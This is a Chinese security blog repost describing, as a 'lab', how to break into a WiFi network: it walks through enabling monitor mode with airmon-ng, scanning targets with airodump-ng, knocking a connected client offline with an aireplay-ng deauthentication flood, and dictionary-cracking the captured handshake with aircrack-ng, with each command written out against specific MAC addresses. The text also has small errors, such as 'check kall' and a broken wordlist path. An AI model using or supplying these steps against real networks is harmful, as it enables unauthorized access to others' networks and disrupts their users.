近源渗透__WIFI密码枚举

admin 2024年2月14日01:35:45评论10 views字数 636阅读2分7秒阅读模式

实验环境:免驱网卡、Kali、airmon-ng

实验概述:通过WIFI干扰使正常用户下线,下线后等待WIFI自动重新连接。这时候抓取该用户的登录包,登录包内包含了WIFI登录密码。再使用字典对登录包的登录密码进行枚举即可。

实验过程:

一、插入网卡

怼入网卡,查看IP多一个网卡就是怼好了。

近源渗透__WIFI密码枚举

二、清除影响进程    

airmon-ng check kall                  #查看影响的进程

使用kill pvid杀掉进程

近源渗透__WIFI密码枚举

三、开启网卡监听

airmon-ng start wlan0            #开启网卡监听

ifconfig或iwconfig查看网卡名字是否更改,验证监听是否成功。

近源渗透__WIFI密码枚举

四、扫描附近WIFI

airodump-ng wlan0mon            #扫描附近wifi

需要记住mac地址(BSSID)与信道(CH)。PWR为信号强度,越低信号越好。

近源渗透__WIFI密码枚举

扫描WIFI连接的终端

airodump-ng --bssid 00:5C:C2:26:36:F5-c 12-w test wlan0mon

近源渗透__WIFI密码枚举

六、断开连接的终端

aireplay-ng -0 20 -a 00:5C:C2:26:36:F5  -c 7E:C7:82:39:63:05 wlan0mon
-0 攻击次数 -a 路由器MAC地址
-c 目标MAC地址

攻击完成终端的WIFI会断掉,用户根目录会生成连接的数据包文件。同时监听处会显示抓到的mac地址

近源渗透__WIFI密码枚举近源渗透__WIFI密码枚举

七、开始爆破

aircrack-ng  -w /root /big_pass.txt  test-01.cap

近源渗透__WIFI密码枚举

近源渗透__WIFI密码枚举

原文始发于微信公众号(YongYe 安全实验室):近源渗透__WIFI密码枚举

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月14日01:35:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   近源渗透__WIFI密码枚举https://cn-sec.com/archives/2204722.html

发表评论

匿名网友 填写信息